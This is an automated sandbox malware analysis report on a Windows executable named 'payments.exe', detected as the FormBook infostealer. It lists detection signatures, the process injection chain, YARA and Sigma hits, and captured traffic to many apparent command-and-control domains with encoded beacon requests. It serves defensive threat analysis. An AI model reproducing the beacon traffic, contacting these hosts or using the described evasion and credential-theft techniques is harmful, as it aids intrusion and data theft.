Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
payments.exe

Overview

General Information

Sample name:payments.exe
Analysis ID:1560289
MD5:63c1545a3e20b0dc33a010e441943d0f
SHA1:316d618c16be07f4783045b6e1d9be6cd516915b
SHA256:8d8c60a5a1bdde82ded1b5c433703d5f4b1063c102df9a5df34e963032cadf73
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • payments.exe (PID: 7444 cmdline: "C:\Users\user\Desktop\payments.exe" MD5: 63C1545A3E20B0DC33A010E441943D0F)
    • svchost.exe (PID: 7536 cmdline: "C:\Users\user\Desktop\payments.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • XhwUfLdILQipZF.exe (PID: 6004 cmdline: "C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • pcaui.exe (PID: 7580 cmdline: "C:\Windows\SysWOW64\pcaui.exe" MD5: A8F63C86DEF45A7E48E7F7DF158CFAA9)
          • XhwUfLdILQipZF.exe (PID: 6608 cmdline: "C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7900 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3800852385.00000000043C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.1455387044.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.3793634224.00000000026A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.3800786167.0000000004370000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.3803049222.0000000005620000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\payments.exe", CommandLine: "C:\Users\user\Desktop\payments.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\payments.exe", ParentImage: C:\Users\user\Desktop\payments.exe, ParentProcessId: 7444, ParentProcessName: payments.exe, ProcessCommandLine: "C:\Users\user\Desktop\payments.exe", ProcessId: 7536, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\payments.exe", CommandLine: "C:\Users\user\Desktop\payments.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\payments.exe", ParentImage: C:\Users\user\Desktop\payments.exe, ParentProcessId: 7444, ParentProcessName: payments.exe, ProcessCommandLine: "C:\Users\user\Desktop\payments.exe", ProcessId: 7536, ProcessName: svchost.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.acond-22-mvr.click/w9z4/Avira URL Cloud: Label: malware
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3800852385.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1455387044.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3793634224.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3800786167.0000000004370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3803049222.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1456263515.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1455910755.0000000003620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3800781510.0000000003710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: payments.exeJoe Sandbox ML: detected
                Source: payments.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: pcaui.pdb source: svchost.exe, 00000002.00000003.1424379839.000000000304D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1424379839.000000000302B000.00000004.00000020.00020000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000003.00000003.1888424648.00000000011DB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XhwUfLdILQipZF.exe, 00000003.00000000.1375164314.0000000000D0E000.00000002.00000001.01000000.00000004.sdmp, XhwUfLdILQipZF.exe, 00000006.00000000.1536552318.0000000000D0E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: payments.exe, 00000000.00000003.1357793161.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, payments.exe, 00000000.00000003.1357005874.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1455944553.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1455944553.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1358223531.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360100767.0000000003500000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3801220213.00000000045C0000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1470322862.000000000440E000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1468233780.0000000004259000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3801220213.000000000475E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: payments.exe, 00000000.00000003.1357793161.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, payments.exe, 00000000.00000003.1357005874.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1455944553.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1455944553.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1358223531.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360100767.0000000003500000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, pcaui.exe, 00000004.00000002.3801220213.00000000045C0000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1470322862.000000000440E000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1468233780.0000000004259000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3801220213.000000000475E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: pcaui.exe, 00000004.00000002.3802641063.0000000004BEC000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3794437127.00000000028CC000.00000004.00000020.00020000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1761090019.000000002FC0C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: pcaui.exe, 00000004.00000002.3802641063.0000000004BEC000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3794437127.00000000028CC000.00000004.00000020.00020000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1761090019.000000002FC0C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: pcaui.pdbGCTL source: svchost.exe, 00000002.00000003.1424379839.000000000304D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1424379839.000000000302B000.00000004.00000020.00020000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000003.00000003.1888424648.00000000011DB000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CD6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00CD6CA9
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CD60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00CD60DD
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CD63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00CD63F9
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CDEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CDEB60
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CDF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CDF5FA
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CDF56F FindFirstFileW,FindClose,0_2_00CDF56F
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CE1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CE1B2F
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CE1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CE1C8A
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CE1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CE1F94
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026BC920 FindFirstFileW,FindNextFileW,FindClose,4_2_026BC920
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4x nop then xor eax, eax4_2_026A9E10
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4x nop then mov ebx, 00000004h4_2_044C04E8

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.rtpterbaruwaktu3.xyz
                Source: DNS query: www.54248711.xyz
                Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
                Source: Joe Sandbox ViewIP Address: 208.91.197.27 208.91.197.27
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CE4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00CE4EB5
                Source: global trafficHTTP traffic detected: GET /7yx4/?bBw=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQb1jyxz6bPKG1jNO+cUySHxdHc2K5rg==&PBk=f4VDN8Bp14IhbV HTTP/1.1Host: www.rtpterbaruwaktu3.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /klhq/?bBw=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ja3Sv08AkNNTw70A3KyR0Ra9u58Xeg==&PBk=f4VDN8Bp14IhbV HTTP/1.1Host: www.70kdd.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /w9z4/?PBk=f4VDN8Bp14IhbV&bBw=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfaaqVLjCwQ54vPxpQXxXjIS5xkDmSEw== HTTP/1.1Host: www.acond-22-mvr.clickAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /11t3/?bBw=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL013w88VAS70Y9JS73ZjbBY8NXuVWXuwPQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1Host: www.smartcongress.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /2pji/?bBw=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT82t+6t4M73z602ZXRfzEt+UzcIaSeg==&PBk=f4VDN8Bp14IhbV HTTP/1.1Host: www.mrpokrovskii.proAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /egqi/?bBw=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8lot5wYlOl469WmdukWuN3NsqkmPJjQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1Host: www.ytsd88.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /hyyd/?PBk=f4VDN8Bp14IhbV&bBw=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX3VjmPRmhRH/ifjHqvJrHFSE8BVe6vQ== HTTP/1.1Host: www.matteicapital.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /rsvy/?bBw=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rQpb0mRwFlkiYxCOBwbKBY/Wtalppug==&PBk=f4VDN8Bp14IhbV HTTP/1.1Host: www.llljjjiii.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /huvt/?bBw=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPcijKU85s4sBliMM2+p3cutSfMcIpXQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1Host: www.ampsamkok88.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /6gtt/?bBw=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbepy0TXn/sNBWKXnk+HntNHa0bIYL3g==&PBk=f4VDN8Bp14IhbV HTTP/1.1Host: www.gogawithme.liveAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /jm2l/?PBk=f4VDN8Bp14IhbV&bBw=M21ir/NSFfGrmB4z/u+JMR/HgMrfgTX4RaXyCSFwSSwtaZs5yH0UEptpPba+9Px3pipv0aZDZRRy+Xo/jJmyg51Tr+0rPqFG3CUyYWI31hnfzG2FIQ== HTTP/1.1Host: www.54248711.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /cvhb/?bBw=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSew4ovcqpU8EMNhqKZYp0bCjlC2qCkSQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1Host: www.canadavinreport.siteAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /z3ox/?bBw=XRVN9XS8GrL3N+/sXJw1nASfMdlrVHj65QayKB69AEGBKWegVMYG7P4Sa4h2i8A2rJx8M9mN63brSxfD4lNhUirL/6ZuF4cRwiIE0+ehkyVFqeLMeg==&PBk=f4VDN8Bp14IhbV HTTP/1.1Host: www.questmatch.proAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /crrp/?bBw=upjfZKq4/ZGfoF/T3gRqvMsDposBEsbCPxdbSO05fQ4zSiP5+UGAxJqZOtAYqZWCOef+BeM6z+3JdRqWgtx/gAtazJHp7Z7XNdyJQnSFd8YmyBfIfQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1Host: www.bser101pp.buzzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficDNS traffic detected: DNS query: www.rtpterbaruwaktu3.xyz
                Source: global trafficDNS traffic detected: DNS query: www.70kdd.top
                Source: global trafficDNS traffic detected: DNS query: www.acond-22-mvr.click
                Source: global trafficDNS traffic detected: DNS query: www.smartcongress.net
                Source: global trafficDNS traffic detected: DNS query: www.mrpokrovskii.pro
                Source: global trafficDNS traffic detected: DNS query: www.ytsd88.top
                Source: global trafficDNS traffic detected: DNS query: www.matteicapital.online
                Source: global trafficDNS traffic detected: DNS query: www.llljjjiii.shop
                Source: global trafficDNS traffic detected: DNS query: www.ampsamkok88.shop
                Source: global trafficDNS traffic detected: DNS query: www.gogawithme.live
                Source: global trafficDNS traffic detected: DNS query: www.54248711.xyz
                Source: global trafficDNS traffic detected: DNS query: www.canadavinreport.site
                Source: global trafficDNS traffic detected: DNS query: www.questmatch.pro
                Source: global trafficDNS traffic detected: DNS query: www.bser101pp.buzz
                Source: global trafficDNS traffic detected: DNS query: www.3kw40881107247y.click
                Source: unknownHTTP traffic detected: POST /klhq/ HTTP/1.1Host: www.70kdd.topAccept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.70kdd.topCache-Control: max-age=0Content-Length: 192Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.70kdd.top/klhq/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)Data Raw: 62 42 77 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 57 5a 30 4c 72 69 44 39 76 66 6c 76 45 4d 36 6b 31 4e 44 55 63 30 6a 53 51 43 51 31 66 64 55 56 64 6d 76 4d 30 70 39 46 2f 34 34 75 45 44 33 77 61 6c 65 30 7a 54 72 39 6d 7a 2f 6d 68 41 57 70 63 73 31 75 47 50 52 6d 69 64 33 51 6b 58 78 68 6c 70 34 68 30 34 77 55 39 4b 58 4b 30 42 61 65 32 39 73 53 41 51 62 44 44 57 41 68 38 31 68 66 39 65 68 56 39 6f 36 73 38 46 42 41 62 73 5a 69 7a 51 30 4b 68 64 42 38 31 6e 74 65 46 6d 72 39 42 63 77 32 64 36 46 59 78 71 48 66 61 36 51 33 72 73 6e 73 71 63 72 4f 74 6e 35 4a 4d 31 4b 35 Data Ascii: bBw=NFwfoXbecwawWZ0LriD9vflvEM6k1NDUc0jSQCQ1fdUVdmvM0p9F/44uED3wale0zTr9mz/mhAWpcs1uGPRmid3QkXxhlp4h04wU9KXK0Bae29sSAQbDDWAh81hf9ehV9o6s8FBAbsZizQ0KhdB81nteFmr9Bcw2d6FYxqHfa6Q3rsnsqcrOtn5JM1K5
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 21 Nov 2024 15:20:35 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 